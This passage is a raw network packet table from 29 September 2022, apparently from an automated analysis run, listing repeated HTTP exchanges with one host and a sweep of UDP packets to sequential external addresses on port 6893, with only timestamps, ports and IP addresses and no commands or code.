                                                                                                                                                Sep 29, 2022 14:50:55.108736038 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:55.108778954 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:55.108815908 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:55.108844995 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:55.108870983 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:55.108897924 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:55.108920097 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:55.108997107 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:56.165606022 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:56.189244032 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:56.189289093 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:56.189302921 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:56.189316988 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:56.189337015 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:56.189352989 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:56.189414024 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:56.189450026 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:57.124434948 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:57.147828102 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:57.147881031 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:57.147903919 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:57.147922993 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:57.147939920 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:57.147958994 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:57.148078918 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:57.150196075 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:58.393838882 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:58.399182081 CEST4977480192.168.2.3172.217.168.67
                                                                                                                                                Sep 29, 2022 14:50:58.399283886 CEST4977380192.168.2.377.88.55.50
                                                                                                                                                Sep 29, 2022 14:50:58.416583061 CEST8049774172.217.168.67192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:58.416754007 CEST4977480192.168.2.3172.217.168.67
                                                                                                                                                Sep 29, 2022 14:50:58.417141914 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:58.417220116 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:58.417264938 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:58.417300940 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:58.417309999 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:58.417354107 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:58.417360067 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:58.417398930 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:58.417485952 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:58.460339069 CEST804977377.88.55.50192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:58.460530996 CEST4977380192.168.2.377.88.55.50
                                                                                                                                                Sep 29, 2022 14:50:59.244831085 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:59.268287897 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:59.268354893 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:59.268394947 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:59.268416882 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:59.268444061 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:59.268465996 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:59.268476009 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:59.268520117 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:59.268520117 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:00.062630892 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:00.086096048 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:00.086149931 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:00.086174965 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:00.086198092 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:00.086221933 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:00.086249113 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:00.086277008 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:00.086317062 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:01.167289972 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:01.190547943 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:01.190586090 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:01.190612078 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:01.190637112 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:01.190663099 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:01.190686941 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:01.190737963 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:01.190778017 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:02.148158073 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:02.171580076 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:02.171638012 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:02.171665907 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:02.171717882 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:02.171746016 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:02.171768904 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:02.171797991 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:02.171849012 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:03.275376081 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:03.298682928 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:03.298728943 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:03.298754930 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:03.298782110 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:03.298809052 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:03.298835039 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:03.298896074 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:03.298955917 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:04.186570883 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:04.210117102 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:04.210165977 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:04.210191011 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:04.210216999 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:04.210242033 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:04.210268974 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:04.210305929 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:04.210381031 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:05.101669073 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:05.125143051 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:05.125185966 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:05.125212908 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:05.125251055 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:05.125274897 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:05.125299931 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:05.125328064 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:05.125392914 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:06.209753036 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:06.233146906 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:06.235407114 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:06.235455990 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:06.235485077 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:06.235512018 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:06.235529900 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:06.235539913 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:06.235583067 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:06.235599041 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:07.245273113 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:07.268635988 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:07.268681049 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:07.268698931 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:07.268712044 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:07.268729925 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:07.268764973 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:07.268871069 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:07.268918991 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:08.258577108 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:08.284008026 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:08.284079075 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:08.284110069 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:08.284152031 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:08.284178972 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:08.284204960 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:08.284229994 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:08.284286976 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:09.224976063 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:09.248409033 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:09.248447895 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:09.248466015 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:09.248482943 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:09.248501062 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:09.248519897 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:09.248564959 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:09.248629093 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:10.086466074 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:10.109971046 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:10.110050917 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:10.110089064 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:10.110129118 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:10.110136986 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:10.110166073 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:10.110193014 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:10.110199928 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:10.110229015 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:11.129595041 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:11.153001070 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:11.153142929 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:11.153171062 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:11.153187990 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:11.153206110 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:11.153225899 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:11.153264999 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:11.153317928 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:12.136291981 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:12.159746885 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:12.159792900 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:12.159818888 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:12.159842968 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:12.159868956 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:12.159893036 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:12.159961939 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:12.160017967 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:13.163290977 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:13.186709881 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:13.186747074 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:13.186767101 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:13.186784983 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:13.186803102 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:13.186820984 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:51:13.186829090 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:13.186891079 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:51:13.186903000 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Sep 29, 2022 14:48:19.324655056 CEST6372253192.168.2.38.8.8.8
                                                                                                                                                Sep 29, 2022 14:48:19.413527966 CEST53637228.8.8.8192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:20.304707050 CEST6552253192.168.2.38.8.8.8
                                                                                                                                                Sep 29, 2022 14:48:20.323483944 CEST53655228.8.8.8192.168.2.3
                                                                                                                                                Sep 29, 2022 14:48:38.460335016 CEST138138192.168.2.3192.168.2.255
                                                                                                                                                Sep 29, 2022 14:48:38.460455894 CEST137137192.168.2.3192.168.2.255
                                                                                                                                                Sep 29, 2022 14:48:39.197716951 CEST137137192.168.2.3192.168.2.255
                                                                                                                                                Sep 29, 2022 14:48:39.963344097 CEST137137192.168.2.3192.168.2.255
                                                                                                                                                Sep 29, 2022 14:48:40.474898100 CEST655236893192.168.2.393.107.12.0
                                                                                                                                                Sep 29, 2022 14:48:40.475143909 CEST655236893192.168.2.393.107.12.1
                                                                                                                                                Sep 29, 2022 14:48:40.475215912 CEST655236893192.168.2.393.107.12.2
                                                                                                                                                Sep 29, 2022 14:48:40.475287914 CEST655236893192.168.2.393.107.12.3
                                                                                                                                                Sep 29, 2022 14:48:40.475416899 CEST655236893192.168.2.393.107.12.4
                                                                                                                                                Sep 29, 2022 14:48:40.475490093 CEST655236893192.168.2.393.107.12.5
                                                                                                                                                Sep 29, 2022 14:48:40.475620031 CEST655236893192.168.2.393.107.12.6
                                                                                                                                                Sep 29, 2022 14:48:40.475714922 CEST655236893192.168.2.393.107.12.7
                                                                                                                                                Sep 29, 2022 14:48:40.475807905 CEST655236893192.168.2.393.107.12.8
                                                                                                                                                Sep 29, 2022 14:48:40.475900888 CEST655236893192.168.2.393.107.12.9
                                                                                                                                                Sep 29, 2022 14:48:40.475987911 CEST655236893192.168.2.393.107.12.10
                                                                                                                                                Sep 29, 2022 14:48:40.476083994 CEST655236893192.168.2.393.107.12.11
                                                                                                                                                Sep 29, 2022 14:48:40.476202011 CEST655236893192.168.2.393.107.12.12
                                                                                                                                                Sep 29, 2022 14:48:40.476279020 CEST655236893192.168.2.393.107.12.13
                                                                                                                                                Sep 29, 2022 14:48:40.476388931 CEST655236893192.168.2.393.107.12.14
                                                                                                                                                Sep 29, 2022 14:48:40.476524115 CEST655236893192.168.2.393.107.12.15
                                                                                                                                                Sep 29, 2022 14:48:40.476622105 CEST655236893192.168.2.393.107.12.16
                                                                                                                                                Sep 29, 2022 14:48:40.476702929 CEST655236893192.168.2.393.107.12.17
                                                                                                                                                Sep 29, 2022 14:48:40.476857901 CEST655236893192.168.2.393.107.12.18
                                                                                                                                                Sep 29, 2022 14:48:40.476944923 CEST655236893192.168.2.393.107.12.19
                                                                                                                                                Sep 29, 2022 14:48:40.477019072 CEST655236893192.168.2.393.107.12.20
                                                                                                                                                Sep 29, 2022 14:48:40.477092981 CEST655236893192.168.2.393.107.12.21
                                                                                                                                                Sep 29, 2022 14:48:40.477196932 CEST655236893192.168.2.393.107.12.22
                                                                                                                                                Sep 29, 2022 14:48:40.477266073 CEST655236893192.168.2.393.107.12.23
                                                                                                                                                Sep 29, 2022 14:48:40.477355957 CEST655236893192.168.2.393.107.12.24
                                                                                                                                                Sep 29, 2022 14:48:40.477437973 CEST655236893192.168.2.393.107.12.25
                                                                                                                                                Sep 29, 2022 14:48:40.477531910 CEST655236893192.168.2.393.107.12.26
                                                                                                                                                Sep 29, 2022 14:48:40.477670908 CEST655236893192.168.2.393.107.12.27
                                                                                                                                                Sep 29, 2022 14:48:40.477775097 CEST655236893192.168.2.393.107.12.28
                                                                                                                                                Sep 29, 2022 14:48:40.496793985 CEST655236893192.168.2.393.107.12.29
                                                                                                                                                Sep 29, 2022 14:48:40.497076035 CEST655236893192.168.2.393.107.12.30
                                                                                                                                                Sep 29, 2022 14:48:40.497376919 CEST655236893192.168.2.393.107.12.31
                                                                                                                                                Sep 29, 2022 14:48:40.497622013 CEST655236893192.168.2.395.1.200.0
                                                                                                                                                Sep 29, 2022 14:48:40.499815941 CEST655236893192.168.2.395.1.200.1
                                                                                                                                                Sep 29, 2022 14:48:40.499926090 CEST655236893192.168.2.395.1.200.2
                                                                                                                                                Sep 29, 2022 14:48:40.500035048 CEST655236893192.168.2.395.1.200.3
                                                                                                                                                Sep 29, 2022 14:48:40.500222921 CEST655236893192.168.2.395.1.200.4
                                                                                                                                                Sep 29, 2022 14:48:40.500428915 CEST655236893192.168.2.395.1.200.5
                                                                                                                                                Sep 29, 2022 14:48:40.500549078 CEST655236893192.168.2.395.1.200.6
                                                                                                                                                Sep 29, 2022 14:48:40.500781059 CEST655236893192.168.2.395.1.200.7
                                                                                                                                                Sep 29, 2022 14:48:40.500781059 CEST655236893192.168.2.395.1.200.8
                                                                                                                                                Sep 29, 2022 14:48:40.500876904 CEST655236893192.168.2.395.1.200.9
                                                                                                                                                Sep 29, 2022 14:48:40.501043081 CEST655236893192.168.2.395.1.200.10
                                                                                                                                                Sep 29, 2022 14:48:40.501199961 CEST655236893192.168.2.395.1.200.11
                                                                                                                                                Sep 29, 2022 14:48:40.501327991 CEST655236893192.168.2.395.1.200.12
                                                                                                                                                Sep 29, 2022 14:48:40.501714945 CEST655236893192.168.2.395.1.200.13
                                                                                                                                                Sep 29, 2022 14:48:40.501933098 CEST655236893192.168.2.395.1.200.14
                                                                                                                                                Sep 29, 2022 14:48:40.502243996 CEST655236893192.168.2.395.1.200.15
                                                                                                                                                Sep 29, 2022 14:48:40.502433062 CEST655236893192.168.2.395.1.200.16
                                                                                                                                                Sep 29, 2022 14:48:40.502832890 CEST655236893192.168.2.395.1.200.17
                                                                                                                                                Sep 29, 2022 14:48:40.503001928 CEST655236893192.168.2.395.1.200.18
                                                                                                                                                Sep 29, 2022 14:48:40.503242970 CEST655236893192.168.2.395.1.200.19
                                                                                                                                                Sep 29, 2022 14:48:40.503643990 CEST655236893192.168.2.395.1.200.20
                                                                                                                                                Sep 29, 2022 14:48:40.503931999 CEST655236893192.168.2.395.1.200.21
                                                                                                                                                Sep 29, 2022 14:48:40.504107952 CEST655236893192.168.2.395.1.200.22
                                                                                                                                                Sep 29, 2022 14:48:40.504187107 CEST655236893192.168.2.395.1.200.23
                                                                                                                                                Sep 29, 2022 14:48:40.504395962 CEST655236893192.168.2.395.1.200.24
                                                                                                                                                Sep 29, 2022 14:48:40.504666090 CEST655236893192.168.2.395.1.200.25
                                                                                                                                                Sep 29, 2022 14:48:40.504748106 CEST655236893192.168.2.395.1.200.26
                                                                                                                                                Sep 29, 2022 14:48:40.504833937 CEST655236893192.168.2.395.1.200.27
                                                                                                                                                Sep 29, 2022 14:48:40.505078077 CEST655236893192.168.2.395.1.200.28
                                                                                                                                                Sep 29, 2022 14:48:40.505223989 CEST655236893192.168.2.395.1.200.29
                                                                                                                                                Sep 29, 2022 14:48:40.505398035 CEST655236893192.168.2.395.1.200.30
                                                                                                                                                Sep 29, 2022 14:48:40.505569935 CEST655236893192.168.2.395.1.200.31
                                                                                                                                                Sep 29, 2022 14:48:40.505731106 CEST655236893192.168.2.387.98.176.0
                                                                                                                                                Sep 29, 2022 14:48:40.515351057 CEST655236893192.168.2.387.98.176.1
                                                                                                                                                Sep 29, 2022 14:48:40.515527010 CEST655236893192.168.2.387.98.176.2
                                                                                                                                                Sep 29, 2022 14:48:40.515783072 CEST655236893192.168.2.387.98.176.3
                                                                                                                                                Sep 29, 2022 14:48:40.516103029 CEST655236893192.168.2.387.98.176.5
                                                                                                                                                Sep 29, 2022 14:48:40.516189098 CEST655236893192.168.2.387.98.176.4
                                                                                                                                                Sep 29, 2022 14:48:40.516274929 CEST655236893192.168.2.387.98.176.6
                                                                                                                                                Sep 29, 2022 14:48:40.516386032 CEST655236893192.168.2.387.98.176.7
                                                                                                                                                Sep 29, 2022 14:48:40.516506910 CEST655236893192.168.2.387.98.176.8
                                                                                                                                                Sep 29, 2022 14:48:40.516618967 CEST655236893192.168.2.387.98.176.9
                                                                                                                                                Sep 29, 2022 14:48:40.516731977 CEST655236893192.168.2.387.98.176.10
                                                                                                                                                Sep 29, 2022 14:48:40.516952991 CEST655236893192.168.2.387.98.176.12
                                                                                                                                                Sep 29, 2022 14:48:40.517033100 CEST655236893192.168.2.387.98.176.11
                                                                                                                                                Sep 29, 2022 14:48:40.517066956 CEST655236893192.168.2.387.98.176.13
                                                                                                                                                Sep 29, 2022 14:48:40.517189980 CEST655236893192.168.2.387.98.176.14
                                                                                                                                                Sep 29, 2022 14:48:40.517299891 CEST655236893192.168.2.387.98.176.15
                                                                                                                                                Sep 29, 2022 14:48:40.517410994 CEST655236893192.168.2.387.98.176.16
                                                                                                                                                Sep 29, 2022 14:48:40.517538071 CEST655236893192.168.2.387.98.176.17
                                                                                                                                                Sep 29, 2022 14:48:40.517651081 CEST655236893192.168.2.387.98.176.18
                                                                                                                                                Sep 29, 2022 14:48:40.518666983 CEST655236893192.168.2.387.98.176.19
                                                                                                                                                Sep 29, 2022 14:48:40.519290924 CEST655236893192.168.2.387.98.176.20
                                                                                                                                                Sep 29, 2022 14:48:40.519624949 CEST655236893192.168.2.387.98.176.21
                                                                                                                                                Sep 29, 2022 14:48:40.519732952 CEST655236893192.168.2.387.98.176.22
                                                                                                                                                Sep 29, 2022 14:48:40.519857883 CEST655236893192.168.2.387.98.176.23
                                                                                                                                                Sep 29, 2022 14:48:40.519959927 CEST655236893192.168.2.387.98.176.24
                                                                                                                                                Sep 29, 2022 14:48:40.520138025 CEST655236893192.168.2.387.98.176.25
                                                                                                                                                Sep 29, 2022 14:48:40.520514965 CEST655236893192.168.2.387.98.176.27
                                                                                                                                                Sep 29, 2022 14:48:40.520596027 CEST655236893192.168.2.387.98.176.26
                                                                                                                                                Sep 29, 2022 14:48:40.520606995 CEST655236893192.168.2.387.98.176.28
                                                                                                                                                Sep 29, 2022 14:48:40.520735979 CEST655236893192.168.2.387.98.176.29
                                                                                                                                                Sep 29, 2022 14:48:40.520823956 CEST655236893192.168.2.387.98.176.30
                                                                                                                                                Sep 29, 2022 14:48:40.521064997 CEST655236893192.168.2.387.98.176.31
                                                                                                                                                Sep 29, 2022 14:48:40.521233082 CEST655236893192.168.2.387.98.176.32
                                                                                                                                                Sep 29, 2022 14:48:40.521310091 CEST655236893192.168.2.387.98.176.33
                                                                                                                                                Sep 29, 2022 14:48:40.521440983 CEST655236893192.168.2.387.98.176.34
                                                                                                                                                Sep 29, 2022 14:48:40.521575928 CEST655236893192.168.2.387.98.176.35
                                                                                                                                                Sep 29, 2022 14:48:40.521704912 CEST655236893192.168.2.387.98.176.36
                                                                                                                                                Sep 29, 2022 14:48:40.521914005 CEST655236893192.168.2.387.98.176.37
                                                                                                                                                Sep 29, 2022 14:48:40.522030115 CEST655236893192.168.2.387.98.176.38
                                                                                                                                                Sep 29, 2022 14:48:40.522171021 CEST655236893192.168.2.387.98.176.39
                                                                                                                                                Sep 29, 2022 14:48:40.522279024 CEST655236893192.168.2.387.98.176.40
                                                                                                                                                Sep 29, 2022 14:48:40.522365093 CEST655236893192.168.2.387.98.176.41
                                                                                                                                                Sep 29, 2022 14:48:40.522491932 CEST655236893192.168.2.387.98.176.42
                                                                                                                                                Sep 29, 2022 14:48:40.522702932 CEST655236893192.168.2.387.98.176.43
                                                                                                                                                Sep 29, 2022 14:48:40.522922993 CEST655236893192.168.2.387.98.176.44
                                                                                                                                                Sep 29, 2022 14:48:40.523088932 CEST655236893192.168.2.387.98.176.45
                                                                                                                                                Sep 29, 2022 14:48:40.523226976 CEST655236893192.168.2.387.98.176.46
                                                                                                                                                Sep 29, 2022 14:48:40.523332119 CEST655236893192.168.2.387.98.176.47
